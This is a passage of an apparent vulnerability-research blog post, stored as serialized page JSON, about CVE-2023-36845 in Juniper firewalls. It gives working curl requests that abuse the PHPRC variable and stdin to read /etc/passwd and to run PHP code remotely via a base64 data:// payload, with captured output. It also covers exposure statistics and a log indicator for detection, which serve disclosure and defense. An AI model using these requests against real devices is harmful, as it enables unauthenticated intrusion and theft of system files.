",[47,87508,87511],{"href":87509,"rel":87510},"https:\u002F\u002Fwww.php.net\u002Fmanual\u002Fen\u002Fini.core.php#ini.auto-prepend-file",[51],"auto_prepend_file","\nsetting to force every php page to load the second file. It’s a clever attack, but if you can’t upload a file, then what can you do? Use ",[47,87514,87517],{"href":87515,"rel":87516},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FStandard_streams#Standard_input_(stdin)",[51],"stdin",", of course.",[18,87520,87521,87522,87527,87528,87531,87532,87534],{},"The Juniper firewalls use the ",[47,87523,87526],{"href":87524,"rel":87525},"https:\u002F\u002Fwww.embedthis.com\u002Fappweb\u002F",[51],"Appweb"," web server. When Appweb invokes a CGI script, it passes a variety of environment variables and arguments so that the script can access the user’s HTTP request. The body of the HTTP request is passed via stdin. The affected firewalls run FreeBSD, and every FreeBSD process can access their stdin by opening ",[886,87529,87530],{},"\u002Fdev\u002Ffd\u002F0",". By sending an HTTP request, we’re able to introduce a “file”, ",[886,87533,87530],{},", to the system.",[18,87536,87537,87538,87540,87541,87544,87545,87547,87548,87551],{},"Using that trick, we can set the PHPRC environment variable to ",[886,87539,87530],{}," and include the desired ",[886,87542,87543],{},"php.ini"," in our HTTP request. The following ",[886,87546,1557],{}," request demonstrates this attack to prepend ",[886,87549,87550],{},"\u002Fetc\u002Fpasswd"," to every response.",[1354,87553,87555],{"className":31740,"code":87554,"language":2186,"meta":219,"style":219},"$ curl \"http:\u002F\u002F10.12.72.1\u002F?PHPRC=\u002Fdev\u002Ffd\u002F0\" --data-binary 'auto_prepend_file=\"\u002Fetc\u002Fpasswd\"'\nroot:*:0:0:Charlie &:\u002Froot:\u002Fbin\u002Fcsh\ndaemon:*:1:1:Owner of many system processes:\u002Froot:\u002Fsbin\u002Fnologin\noperator:*:2:5:System &:\u002F:\u002Fsbin\u002Fnologin\nbin:*:3:7:Binaries Commands and Source:\u002F:\u002Fsbin\u002Fnologin\ntty:*:4:65533:Tty Sandbox:\u002F:\u002Fsbin\u002Fnologin\nkmem:*:5:65533:KMem Sandbox:\u002F:\u002Fsbin\u002Fnologin\ngames:*:7:13:Games pseudo-user:\u002Fusr\u002Fgames:\u002Fsbin\u002Fnologin\nman:*:9:9:Mister Man Pages:\u002Fusr\u002Fshare\u002Fman:\u002Fsbin\u002Fnologin\nsshd:*:22:22:Secure Shell Daemon:\u002Fvar\u002Fempty:\u002Fsbin\u002Fnologin\next:*:39:39:External applications:\u002F:\u002Fsbin\u002Fnologin\nbind:*:53:53:Bind Sandbox:\u002F:\u002Fsbin\u002Fnologin\nuucp:*:66:66:UUCP pseudo-user:\u002Fvar\u002Fspool\u002Fuucppublic:\u002Fsbin\u002Fnologin\nnobody:*:65534:65534:Unprivileged user:\u002Fnonexistent:\u002Fsbin\u002Fnologin\n\u003C!DOCTYPE HTML PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD HTML 4.01 Transitional\u002F\u002FEN\">\n\u003Chtml>\n \u003Chead>\n \u003Cmeta http-equiv=\"Content-Type\" content=\"text\u002Fhtml\"\u002F>\n \u003Clink rel=\"stylesheet\" href=\"\u002Fstylesheet\u002Fjuniper.css\" type=\"text\u002Fcss\"\u002F>\n \u003Ctitle>Log In - Juniper Web Device Manager\u003C\u002Ftitle>\n \u003Clink rel=\"shortcut icon\" href='images\u002Ffavicon.ico' type=\"image\u002Fx-icon\"\u002F>\n \u003C\u002Fhead>\n",[886,87556,87557,87580,87591,87607,87617,87630,87638,87645,87653,87664,87675,87683,87690,87698,87706,87726,87734,87742,87771,87809,87845,87882],{"__ignoreMap":219},[1373,87558,87559,87561,87563,87565,87568,87570,87573,87575,87578],{"class":1375,"line":1376},[1373,87560,4644],{"class":2206},[1373,87562,2222],{"class":1391},[1373,87564,4883],{"class":1387},[1373,87566,87567],{"class":1391},"http:\u002F\u002F10.12.72.1\u002F?PHPRC=\u002Fdev\u002Ffd\u002F0",[1373,87569,183],{"class":1387},[1373,87571,87572],{"class":2209}," --data-binary",[1373,87574,4713],{"class":1387},[1373,87576,87577],{"class":1391},"auto_prepend_file=\"\u002Fetc\u002Fpasswd\"",[1373,87579,76063],{"class":1387},[1373,87581,87582,87585,87588],{"class":1375,"line":220},[1373,87583,87584],{"class":2206},"root:*:0:0:Charlie",[1373,87586,87587],{"class":1383}," &",[1373,87589,87590],{"class":2206},":\u002Froot:\u002Fbin\u002Fcsh\n",[1373,87592,87593,87596,87598,87601,87604],{"class":1375,"line":1266},[1373,87594,87595],{"class":2206},"daemon:*:1:1:Owner",[1373,87597,55815],{"class":1391},[1373,87599,87600],{"class":1391}," many",[1373,87602,87603],{"class":1391}," system",[1373,87605,87606],{"class":1391}," processes:\u002Froot:\u002Fsbin\u002Fnologin\n",[1373,87608,87609,87612,87614],{"class":1375,"line":1852},[1373,87610,87611],{"class":2206},"operator:*:2:5:System",[1373,87613,87587],{"class":1383},[1373,87615,87616],{"class":2206},":\u002F:\u002Fsbin\u002Fnologin\n",[1373,87618,87619,87622,87625,87627],{"class":1375,"line":4692},[1373,87620,87621],{"class":2206},"bin:*:3:7:Binaries",[1373,87623,87624],{"class":1391}," Commands",[1373,87626,67041],{"class":1391},[1373,87628,87629],{"class":1391}," Source:\u002F:\u002Fsbin\u002Fnologin\n",[1373,87631,87632,87635],{"class":1375,"line":4724},[1373,87633,87634],{"class":2206},"tty:*:4:65533:Tty",[1373,87636,87637],{"class":1391}," Sandbox:\u002F:\u002Fsbin\u002Fnologin\n",[1373,87639,87640,87643],{"class":1375,"line":4756},[1373,87641,87642],{"class":2206},"kmem:*:5:65533:KMem",[1373,87644,87637],{"class":1391},[1373,87646,87647,87650],{"class":1375,"line":4768},[1373,87648,87649],{"class":2206},"games:*:7:13:Games",[1373,87651,87652],{"class":1391}," pseudo-user:\u002Fusr\u002Fgames:\u002Fsbin\u002Fnologin\n",[1373,87654,87655,87658,87661],{"class":1375,"line":4792},[1373,87656,87657],{"class":2206},"man:*:9:9:Mister",[1373,87659,87660],{"class":1391}," Man",[1373,87662,87663],{"class":1391}," Pages:\u002Fusr\u002Fshare\u002Fman:\u002Fsbin\u002Fnologin\n",[1373,87665,87666,87669,87672],{"class":1375,"line":4798},[1373,87667,87668],{"class":2206},"sshd:*:22:22:Secure",[1373,87670,87671],{"class":1391}," Shell",[1373,87673,87674],{"class":1391}," Daemon:\u002Fvar\u002Fempty:\u002Fsbin\u002Fnologin\n",[1373,87676,87677,87680],{"class":1375,"line":4806},[1373,87678,87679],{"class":2206},"ext:*:39:39:External",[1373,87681,87682],{"class":1391}," applications:\u002F:\u002Fsbin\u002Fnologin\n",[1373,87684,87685,87688],{"class":1375,"line":4817},[1373,87686,87687],{"class":2206},"bind:*:53:53:Bind",[1373,87689,87637],{"class":1391},[1373,87691,87692,87695],{"class":1375,"line":4825},[1373,87693,87694],{"class":2206},"uucp:*:66:66:UUCP",[1373,87696,87697],{"class":1391}," pseudo-user:\u002Fvar\u002Fspool\u002Fuucppublic:\u002Fsbin\u002Fnologin\n",[1373,87699,87700,87703],{"class":1375,"line":4835},[1373,87701,87702],{"class":2206},"nobody:*:65534:65534:Unprivileged",[1373,87704,87705],{"class":1391}," user:\u002Fnonexistent:\u002Fsbin\u002Fnologin\n",[1373,87707,87708,87710,87712,87715,87717,87719,87722,87724],{"class":1375,"line":4843},[1373,87709,6755],{"class":1397},[1373,87711,6758],{"class":2206},[1373,87713,87714],{"class":1391}," HTML",[1373,87716,51790],{"class":1391},[1373,87718,4883],{"class":1387},[1373,87720,87721],{"class":1391},"-\u002F\u002FW3C\u002F\u002FDTD HTML 4.01 Transitional\u002F\u002FEN",[1373,87723,183],{"class":1387},[1373,87725,6765],{"class":1397},[1373,87727,87728,87730,87732],{"class":1375,"line":4849},[1373,87729,11852],{"class":1397},[1373,87731,8230],{"class":4640},[1373,87733,6765],{"class":1397},[1373,87735,87736,87738,87740],{"class":1375,"line":4877},[1373,87737,48971],{"class":1397},[1373,87739,48974],{"class":2206},[1373,87741,6765],{"class":4640},[1373,87743,87744,87746,87748,87751,87753,87755,87757,87760,87762,87765,87767,87769],{"class":1375,"line":4915},[1373,87745,8246],{"class":1397},[1373,87747,48983],{"class":2206},[1373,87749,87750],{"class":1391}," http-equiv=",[1373,87752,183],{"class":1387},[1373,87754,6391],{"class":1391},[1373,87756,183],{"class":1387},[1373,87758,87759],{"class":1391}," content=",[1373,87761,183],{"class":1387},[1373,87763,87764],{"class":1391},"text\u002Fhtml",[1373,87766,183],{"class":1387},[1373,87768,2180],{"class":4640},[1373,87770,6765],{"class":1397},[1373,87772,87773,87775,87777,87780,87782,87784,87786,87789,87791,87794,87796,87799,87801,87803,87805,87807],{"class":1375,"line":4931},[1373,87774,8246],{"class":1397},[1373,87776,30586],{"class":2206},[1373,87778,87779],{"class":1391}," rel=",[1373,87781,183],{"class":1387},[1373,87783,49025],{"class":1391},[1373,87785,183],{"class":1387},[1373,87787,87788],{"class":1391}," href=",[1373,87790,183],{"class":1387},[1373,87792,87793],{"class":1391},"\u002Fstylesheet\u002Fjuniper.css",[1373,87795,183],{"class":1387},[1373,87797,87798],{"class":1391}," type=",[1373,87800,183],{"class":1387},[1373,87802,49066],{"class":1391},[1373,87804,183],{"class":1387},[1373,87806,2180],{"class":4640},[1373,87808,6765],{"class":1397},[1373,87810,87811,87813,87815,87817,87819,87822,87824,87827,87830,87833,87836,87838,87841,87843],{"class":1375,"line":4947},[1373,87812,8246],{"class":1397},[1373,87814,51864],{"class":2206},[1373,87816,5384],{"class":4640},[1373,87818,15072],{"class":1391},[1373,87820,87821],{"class":1391}," In",[1373,87823,27425],{"class":1391},[1373,87825,87826],{"class":1391}," Juniper",[1373,87828,87829],{"class":1391}," Web",[1373,87831,87832],{"class":1391}," Device",[1373,87834,87835],{"class":1391}," Manager",[1373,87837,11852],{"class":1397},[1373,87839,87840],{"class":1391},"\u002Ftitl",[1373,87842,74628],{"class":4640},[1373,87844,6765],{"class":1397},[1373,87846,87847,87849,87851,87853,87855,87858,87860,87862,87864,87867,87869,87871,87873,87876,87878,87880],{"class":1375,"line":4952},[1373,87848,8246],{"class":1397},[1373,87850,30586],{"class":2206},[1373,87852,87779],{"class":1391},[1373,87854,183],{"class":1387},[1373,87856,87857],{"class":1391},"shortcut icon",[1373,87859,183],{"class":1387},[1373,87861,87788],{"class":1391},[1373,87863,1388],{"class":1387},[1373,87865,87866],{"class":1391},"images\u002Ffavicon.ico",[1373,87868,1388],{"class":1387},[1373,87870,87798],{"class":1391},[1373,87872,183],{"class":1387},[1373,87874,87875],{"class":1391},"image\u002Fx-icon",[1373,87877,183],{"class":1387},[1373,87879,2180],{"class":4640},[1373,87881,6765],{"class":1397},[1373,87883,87884,87886,87889],{"class":1375,"line":6776},[1373,87885,48971],{"class":1397},[1373,87887,87888],{"class":2206},"\u002Fhead",[1373,87890,6765],{"class":4640},[18,87892,87893,87894,87896],{},"That’s a neat information leak (and we have another interesting one in the appendix), but it isn’t code execution. To achieve code execution, watchTowr used two files. One for the ",[886,87895,87543],{}," and one with arbitrary PHP. We can’t upload a second file, but we found a workaround for that as well.",[61,87898,87900],{"id":87899},"a-wild-php-feature-to-the-rescue","A Wild PHP Feature to the Rescue",[18,87902,87903,87905,87906,87908],{},[886,87904,87511],{}," is simple. It just causes the provided file to be added using the ",[886,87907,1622],{}," function. The description from php.net:",[1925,87910,87911],{},[18,87912,87913],{},"auto_prepend_file string\nSpecifies the name of a file that is automatically parsed before the main file. The file is included as if it was called with the require function, so include_path is used.",[18,87915,87916,87917,87919,87920,4606],{},"For our attack, another PHP feature pairs well with ",[886,87918,87511],{},". That feature is ",[47,87921,87924],{"href":87922,"rel":87923},"https:\u002F\u002Fwww.php.net\u002Fmanual\u002Fen\u002Ffilesystem.configuration.php#ini.allow-url-include",[51],"allow_url_include",[1925,87926,87927],{},[18,87928,87929],{},"allow_url_include bool\nThis option allows the use of URL-aware fopen wrappers with the following functions: include, include_once, require, require_once.",[18,87931,87932,87933,87935,87936,20559,87941,87943,87944,87947,87948,87951,87952,4606],{},"By enabling ",[886,87934,87924],{},", we can use any ",[47,87937,87940],{"href":87938,"rel":87939},"https:\u002F\u002Fwww.php.net\u002Fmanual\u002Fen\u002Fwrappers.php",[51],"protocol wrapper",[886,87942,87511],{},". The obvious choice is ",[886,87945,87946],{},"data:\u002F\u002F"," to provide the “second file” inline. Below is an example of this attack that executes ",[886,87949,87950],{},"\u003C? phpinfo(); ?>"," which is embedded in ",[886,87953,87946],{},[1354,87955,87957],{"className":31740,"code":87956,"language":2186,"meta":219,"style":219},"$ curl \"http:\u002F\u002F10.12.72.1\u002F?PHPRC=\u002Fdev\u002Ffd\u002F0\" --data-binary $'allow_url_include=1\\nauto_prepend_file=\"data:\u002F\u002Ftext\u002Fplain;base64,PD8KICAgcGhwaW5mbygpOwo\u002FPg==\"'\n\u003C!DOCTYPE html PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD XHTML 1.0 Transitional\u002F\u002FEN\" \"DTD\u002Fxhtml1-transitional.dtd\">\n\u003Chtml>\u003Chead>\n\u003Cstyle type=\"text\u002Fcss\">\nbody {background-color: #ffffff; color: #000000;}\nbody, td, th, h1, h2 {font-family: sans-serif;}\npre {margin: 0px; font-family: monospace;}\na:link {color: #000099; text-decoration: none; background-color: #ffffff;}\na:hover {text-decoration: underline;}\ntable {border-collapse: collapse;}\n.center {text-align: center;}\n.center table { margin-left: auto; margin-right: auto; text-align: left;}\n.center th { text-align: center !important; }\ntd, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}\nh1 {font-size: 150%;}\nh2 {font-size: 125%;}\n.p {text-align: left;}\n.e {background-color: #ccccff; font-weight: bold; color: #000000;}\n.h {background-color: #9999cc; font-weight: bold; color: #000000;}\n.v {background-color: #cccccc; color: #000000;}\n.vr {background-color: #cccccc; text-align: right; color: #000000;}\nimg {float: right; border: 0px;}\nhr {width: 600px; background-color: #cccccc; border: 0px; height: 1px; color: #000000;}\n\u003C\u002Fstyle>\n\u003Ctitle>phpinfo()\u003C\u002Ftitle>\u003Cmeta name=\"ROBOTS\" content=\"NOINDEX,NOFOLLOW,NOARCHIVE\" \u002F>\u003C\u002Fhead>\n\u003Cbody>\u003Cdiv class=\"center\">\n",[886,87958,87959,87986,88012,88021,88038,88048,88075,88097,88108,88123,88137,88152,88186,88206,88227,88241,88254,88267,88277,88287,88297,88307,88327,88345,88354,88392],{"__ignoreMap":219},[1373,87960,87961,87963,87965,87967,87969,87971,87973,87976,87979,87981,87984],{"class":1375,"line":1376},[1373,87962,4644],{"class":2206},[1373,87964,2222],{"class":1391},[1373,87966,4883],{"class":1387},[1373,87968,87567],{"class":1391},[1373,87970,183],{"class":1387},[1373,87972,87572],{"class":2209},[1373,87974,87975],{"class":1387}," $'",[1373,87977,87978],{"class":1391},"allow_url_include=1",[1373,87980,8943],{"class":2326},[1373,87982,87983],{"class":1391},"auto_prepend_file=\"data:\u002F\u002Ftext\u002Fplain;base64,PD8KICAgcGhwaW5mbygpOwo\u002FPg==\"",[1373,87985,76063],{"class":1387},[1373,87987,87988,87990,87992,87994,87996,87998,88001,88003,88005,88008,88010],{"class":1375,"line":220},[1373,87989,6755],{"class":1397},[1373,87991,6758],{"class":2206},[1373,87993,6762],{"class":1391},[1373,87995,51790],{"class":1391},[1373,87997,4883],{"class":1387},[1373,87999,88000],{"class":1391},"-\u002F\u002FW3C\u002F\u002FDTD XHTML 1.0 Transitional\u002F\u002FEN",[1373,88002,183],{"class":1387},[1373,88004,4883],{"class":1387},[1373,88006,88007],{"class":1391},"DTD\u002Fxhtml1-transitional.dtd",[1373,88009,183],{"class":1387},[1373,88011,6765],{"class":1397},[1373,88013,88014,88016,88019],{"class":1375,"line":1266},[1373,88015,11852],{"class":1397},[1373,88017,88018],{"class":4640},"html>\u003Chead",[1373,88020,6765],{"class":1397},[1373,88022,88023,88025,88028,88030,88032,88034,88036],{"class":1375,"line":1852},[1373,88024,11852],{"class":1397},[1373,88026,88027],{"class":4640},"style type",[1373,88029,5417],{"class":1397},[1373,88031,183],{"class":1387},[1373,88033,49066],{"class":1391},[1373,88035,183],{"class":1387},[1373,88037,6765],{"class":1397},[1373,88039,88040,88042,88045],{"class":1375,"line":4692},[1373,88041,20718],{"class":2206},[1373,88043,88044],{"class":1391}," {background-color:",[1373,88046,88047],{"class":4630}," #ffffff; color: #000000;}\n",[1373,88049,88050,88053,88056,88059,88062,88065,88068,88071,88073],{"class":1375,"line":4724},[1373,88051,88052],{"class":2206},"body,",[1373,88054,88055],{"class":1391}," td,",[1373,88057,88058],{"class":1391}," th,",[1373,88060,88061],{"class":1391}," h1,",[1373,88063,88064],{"class":1391}," h2",[1373,88066,88067],{"class":1391}," {font-family:",[1373,88069,88070],{"class":1391}," sans-serif",[1373,88072,39663],{"class":1383},[1373,88074,1855],{"class":4640},[1373,88076,88077,88079,88082,88085,88087,88090,88093,88095],{"class":1375,"line":4756},[1373,88078,1354],{"class":2206},[1373,88080,88081],{"class":1391}," {margin:",[1373,88083,88084],{"class":1391}," 0px",[1373,88086,39663],{"class":1383},[1373,88088,88089],{"class":2206}," font-family:",[1373,88091,88092],{"class":1391}," monospace",[1373,88094,39663],{"class":1383},[1373,88096,1855],{"class":4640},[1373,88098,88099,88102,88105],{"class":1375,"line":4768},[1373,88100,88101],{"class":2206},"a:link",[1373,88103,88104],{"class":1391}," {color:",[1373,88106,88107],{"class":4630}," #000099; text-decoration: none; background-color: #ffffff;}\n",[1373,88109,88110,88113,88116,88119,88121],{"class":1375,"line":4792},[1373,88111,88112],{"class":2206},"a:hover",[1373,88114,88115],{"class":1391}," {text-decoration:",[1373,88117,88118],{"class":1391}," underline",[1373,88120,39663],{"class":1383},[1373,88122,1855],{"class":4640},[1373,88124,88125,88127,88130,88133,88135],{"class":1375,"line":4798},[1373,88126,307],{"class":2206},[1373,88128,88129],{"class":1391}," {border-collapse:",[1373,88131,88132],{"class":1391}," collapse",[1373,88134,39663],{"class":1383},[1373,88136,1855],{"class":4640},[1373,88138,88139,88142,88145,88148,88150],{"class":1375,"line":4806},[1373,88140,88141],{"class":2206},".center",[1373,88143,88144],{"class":1391}," {text-align:",[1373,88146,88147],{"class":1391}," center",[1373,88149,39663],{"class":1383},[1373,88151,1855],{"class":4640},[1373,88153,88154,88156,88159,88161,88164,88167,88169,88172,88174,88176,88179,88182,88184],{"class":1375,"line":4817},[1373,88155,88141],{"class":2206},[1373,88157,88158],{"class":1391}," table",[1373,88160,5420],{"class":1391},[1373,88162,88163],{"class":1391}," margin-left:",[1373,88165,88166],{"class":1391}," auto",[1373,88168,39663],{"class":1383},[1373,88170,88171],{"class":2206}," margin-right:",[1373,88173,88166],{"class":1391},[1373,88175,39663],{"class":1383},[1373,88177,88178],{"class":2206}," text-align:",[1373,88180,88181],{"class":1391}," left",[1373,88183,39663],{"class":1383},[1373,88185,1855],{"class":4640},[1373,88187,88188,88190,88193,88195,88197,88199,88202,88204],{"class":1375,"line":4825},[1373,88189,88141],{"class":2206},[1373,88191,88192],{"class":1391}," th",[1373,88194,5420],{"class":1391},[1373,88196,88178],{"class":1391},[1373,88198,88147],{"class":1391},[1373,88200,88201],{"class":1391}," !important",[1373,88203,39663],{"class":1383},[1373,88205,35334],{"class":4640},[1373,88207,88208,88211,88213,88215,88218,88221,88224],{"class":1375,"line":4835},[1373,88209,88210],{"class":2206},"td,",[1373,88212,88192],{"class":1391},[1373,88214,5420],{"class":1391},[1373,88216,88217],{"class":1391}," border:",[1373,88219,88220],{"class":1391}," 1px",[1373,88222,88223],{"class":1391}," solid",[1373,88225,88226],{"class":4630}," #000000; font-size: 75%; vertical-align: baseline;}\n",[1373,88228,88229,88231,88234,88237,88239],{"class":1375,"line":4843},[1373,88230,1920],{"class":2206},[1373,88232,88233],{"class":1391}," {font-size:",[1373,88235,88236],{"class":1391}," 150%",[1373,88238,39663],{"class":1383},[1373,88240,1855],{"class":4640},[1373,88242,88243,88245,88247,88250,88252],{"class":1375,"line":4849},[1373,88244,61],{"class":2206},[1373,88246,88233],{"class":1391},[1373,88248,88249],{"class":1391}," 125%",[1373,88251,39663],{"class":1383},[1373,88253,1855],{"class":4640},[1373,88255,88256,88259,88261,88263,88265],{"class":1375,"line":4877},[1373,88257,88258],{"class":2206},".p",[1373,88260,88144],{"class":1391},[1373,88262,88181],{"class":1391},[1373,88264,39663],{"class":1383},[1373,88266,1855],{"class":4640},[1373,88268,88269,88272,88274],{"class":1375,"line":4915},[1373,88270,88271],{"class":2206},".e",[1373,88273,88044],{"class":1391},[1373,88275,88276],{"class":4630}," #ccccff; font-weight: bold; color: #000000;}\n",[1373,88278,88279,88282,88284],{"class":1375,"line":4931},[1373,88280,88281],{"class":2206},".h",[1373,88283,88044],{"class":1391},[1373,88285,88286],{"class":4630}," #9999cc; font-weight: bold; color: #000000;}\n",[1373,88288,88289,88292,88294],{"class":1375,"line":4947},[1373,88290,88291],{"class":2206},".v",[1373,88293,88044],{"class":1391},[1373,88295,88296],{"class":4630}," #cccccc; color: #000000;}\n",[1373,88298,88299,88302,88304],{"class":1375,"line":4952},[1373,88300,88301],{"class":2206},".vr",[1373,88303,88044],{"class":1391},[1373,88305,88306],{"class":4630}," #cccccc; text-align: right; color: #000000;}\n",[1373,88308,88309,88311,88314,88317,88319,88321,88323,88325],{"class":1375,"line":6776},[1373,88310,68],{"class":2206},[1373,88312,88313],{"class":1391}," {float:",[1373,88315,88316],{"class":1391}," right",[1373,88318,39663],{"class":1383},[1373,88320,88217],{"class":2206},[1373,88322,88084],{"class":1391},[1373,88324,39663],{"class":1383},[1373,88326,1855],{"class":4640},[1373,88328,88329,88331,88334,88337,88339,88342],{"class":1375,"line":6781},[1373,88330,1308],{"class":2206},[1373,88332,88333],{"class":1391}," {width:",[1373,88335,88336],{"class":1391}," 600px",[1373,88338,39663],{"class":1383},[1373,88340,88341],{"class":2206}," background-color:",[1373,88343,88344],{"class":4630}," #cccccc; border: 0px; height: 1px; color: #000000;}\n",[1373,88346,88347,88349,88352],{"class":1375,"line":7524},[1373,88348,11852],{"class":1397},[1373,88350,88351],{"class":4640},"\u002Fstyle",[1373,88353,6765],{"class":1397},[1373,88355,88356,88359,88361,88363,88366,88368,88370,88373,88375,88377,88379,88381,88384,88386,88389],{"class":1375,"line":7530},[1373,88357,88358],{"class":7297},"\u003Ctitle>phpinfo",[1373,88360,7514],{"class":1383},[1373,88362,11852],{"class":1397},[1373,88364,88365],{"class":4640},"\u002Ftitle>\u003Cmeta name",[1373,88367,5417],{"class":1397},[1373,88369,183],{"class":1387},[1373,88371,88372],{"class":1391},"ROBOTS",[1373,88374,183],{"class":1387},[1373,88376,51846],{"class":4640},[1373,88378,5417],{"class":1397},[1373,88380,183],{"class":1387},[1373,88382,88383],{"class":1391},"NOINDEX,NOFOLLOW,NOARCHIVE",[1373,88385,183],{"class":1387},[1373,88387,88388],{"class":2206}," \u002F",[1373,88390,88391],{"class":4640},">\u003C\u002Fhead>\n",[1373,88393,88394,88396,88399,88401,88403,88405,88407],{"class":1375,"line":7546},[1373,88395,11852],{"class":1397},[1373,88397,88398],{"class":4640},"body>\u003Cdiv class",[1373,88400,5417],{"class":1397},[1373,88402,183],{"class":1387},[1373,88404,318],{"class":1391},[1373,88406,183],{"class":1387},[1373,88408,6765],{"class":1397},[18,88410,88411],{},"Just like that, by only using CVE-2023-36845, we’ve achieved unauthenticated and remote code execution without actually dropping a file on disk. Our private exploit establishes a reverse shell, but that’s quite trivial once you’ve reached this point.",[61,88413,88415],{"id":88414},"real-world-impact","Real World Impact",[18,88417,88418,88422],{},[47,88419,41731],{"href":88420,"rel":88421},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=title%3A%22Juniper%22+http.favicon.hash%3A2141724739",[51]," shows approximately 15,000 Juniper devices with internet-facing web interfaces (caution has to be taken when crafting this query because there are about the same amount of honeypots):",[18,88424,88425],{},[68,88426],{":width":10862,"alt":88427,"src":88428},"Juniper J-Web on Shodan","\u002Fblog\u002Fjuniper-cve-2023-36845\u002Fshodan-jweb.png",[18,88430,88431,88432,88435,88436,88440],{},"We wrote a scanner that generates an error on affected systems by setting the LD_PRELOAD environment variable. We’ve made it available on ",[47,88433,2485],{"href":83426,"rel":88434},[51],". On a representative sample size (n=3000), we found that 79% of the responding targets were unpatched. This is particularly troublesome since both ",[47,88437,11024],{"href":88438,"rel":88439},"https:\u002F\u002Fx.com\u002FShadowserver\u002Fstatus\u002F1696512418036486246",[51]," and GreyNoise have seen attackers probing the watchTowr endpoint (webauth_operation.php).",[18,88442,88443],{},[68,88444],{":width":10862,"alt":88445,"src":88446},"Juniper attacker on Greynoise","\u002Fblog\u002Fjuniper-cve-2023-36845\u002Fgreynoise-webauth-operation.png",[18,88448,88449,88450,88452],{},"Firewalls are interesting targets to APT as they help bridge into the protected network and can serve as useful hosts for C2 infrastructure. Anyone who has an unpatched Juniper firewall should examine it for signs of compromise. The ",[886,88451,86174],{}," is particularly useful as it may contain tidbits like:",[1925,88454,88455],{},[18,88456,88457],{},"httpd: 2: POST \u002F?PHPRC=\u002Fdev\u002Ffd\u002F0 HTTP\u002F1.1",[18,88459,88460],{},"It’s worth noting that attackers can get around including variables in the HTTP header; we only did that here for clarity. For example, the information leak works just fine using multipart form data:",[1354,88462,88464],{"className":31740,"code":88463,"language":2186,"meta":219,"style":219},"$ curl \"http:\u002F\u002F10.12.72.1\u002F\" -F $'auto_prepend_file=\"\u002Fetc\u002Fpasswd\\n\"' -F 'PHPRC=\u002Fdev\u002Ffd\u002F0'\nroot:*:0:0:Charlie &:\u002Froot:\u002Fbin\u002Fcsh\ndaemon:*:1:1:Owner of many system processes:\u002Froot:\u002Fsbin\u002Fnologin\noperator:*:2:5:System &:\u002F:\u002Fsbin\u002Fnologin\nbin:*:3:7:Binaries Commands and Source:\u002F:\u002Fsbin\u002Fnologin\ntty:*:4:65533:Tty Sandbox:\u002F:\u002Fsbin\u002Fnologin\nkmem:*:5:65533:KMem Sandbox:\u002F:\u002Fsbin\u002Fnologin\ngames:*:7:13:Games pseudo-user:\u002Fusr\u002Fgames:\u002Fsbin\u002Fnologin\nman:*:9:9:Mister Man Pages:\u002Fusr\u002Fshare\u002Fman:\u002Fsbin\u002Fnologin\nsshd:*:22:22:Secure Shell Daemon:\u002Fvar\u002Fempty:\u002Fsbin\u002Fnologin\next:*:39:39:External applications:\u002F:\u002Fsbin\u002Fnologin\nbind:*:53:53:Bind Sandbox:\u002F:\u002Fsbin\u002Fnologin\nuucp:*:66:66:UUCP pseudo-user:\u002Fvar\u002Fspool\u002Fuucppublic:\u002Fsbin\u002Fnologin\nnobody:*:65534:65534:Unprivileged user:\u002Fnonexistent:\u002Fsbin\u002Fnologin\n\u003C!DOCTYPE HTML PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD HTML 4.01 Transitional\u002F\u002FEN\">\n\u003Chtml>\n \u003Chead>\n \u003Cmeta http-equiv=\"Content-Type\" content=\"text\u002Fhtml\"\u002F>\n \u003Clink rel=\"stylesheet\" href=\"\u002Fstylesheet\u002Fjuniper.css\" type=\"text\u002Fcss\"\u002F>\n \u003Ctitle>Log In - Juniper Web Device Manager\u003C\u002Ftitle>\n \u003Clink rel=\"shortcut icon\" href='images\u002Ffavicon.ico' type=\"image\u002Fx-icon\"\u002F>\n \u003C\u002Fhead>\n",[886,88465,88466,88502,88510,88522,88530,88540,88546,88552,88558,88566,88574,88580,88586,88592,88598,88616,88624,88632,88658,88692,88722,88756],{"__ignoreMap":219},[1373,88467,88468,88470,88472,88474,88477,88479,88482,88484,88487,88489,88491,88493,88495,88497,88500],{"class":1375,"line":1376},[1373,88469,4644],{"class":2206},[1373,88471,2222],{"class":1391},[1373,88473,4883],{"class":1387},[1373,88475,88476],{"class":1391},"http:\u002F\u002F10.12.72.1\u002F",[1373,88478,183],{"class":1387},[1373,88480,88481],{"class":2209}," -F",[1373,88483,87975],{"class":1387},[1373,88485,88486],{"class":1391},"auto_prepend_file=\"\u002Fetc\u002Fpasswd",[1373,88488,8943],{"class":2326},[1373,88490,183],{"class":1391},[1373,88492,1388],{"class":1387},[1373,88494,88481],{"class":2209},[1373,88496,4713],{"class":1387},[1373,88498,88499],{"class":1391},"PHPRC=\u002Fdev\u002Ffd\u002F0",[1373,88501,76063],{"class":1387},[1373,88503,88504,88506,88508],{"class":1375,"line":220},[1373,88505,87584],{"class":2206},[1373,88507,87587],{"class":1383},[1373,88509,87590],{"class":2206},[1373,88511,88512,88514,88516,88518,88520],{"class":1375,"line":1266},[1373,88513,87595],{"class":2206},[1373,88515,55815],{"class":1391},[1373,88517,87600],{"class":1391},[1373,88519,87603],{"class":1391},[1373,88521,87606],{"class":1391},[1373,88523,88524,88526,88528],{"class":1375,"line":1852},[1373,88525,87611],{"class":2206},[1373,88527,87587],{"class":1383},[1373,88529,87616],{"class":2206},[1373,88531,88532,88534,88536,88538],{"class":1375,"line":4692},[1373,88533,87621],{"class":2206},[1373,88535,87624],{"class":1391},[1373,88537,67041],{"class":1391},[1373,88539,87629],{"class":1391},[1373,88541,88542,88544],{"class":1375,"line":4724},[1373,88543,87634],{"class":2206},[1373,88545,87637],{"class":1391},[1373,88547,88548,88550],{"class":1375,"line":4756},[1373,88549,87642],{"class":2206},[1373,88551,87637],{"class":1391},[1373,88553,88554,88556],{"class":1375,"line":4768},[1373,88555,87649],{"class":2206},[1373,88557,87652],{"class":1391},[1373,88559,88560,88562,88564],{"class":1375,"line":4792},[1373,88561,87657],{"class":2206},[1373,88563,87660],{"class":1391},[1373,88565,87663],{"class":1391},[1373,88567,88568,88570,88572],{"class":1375,"line":4798},[1373,88569,87668],{"class":2206},[1373,88571,87671],{"class":1391},[1373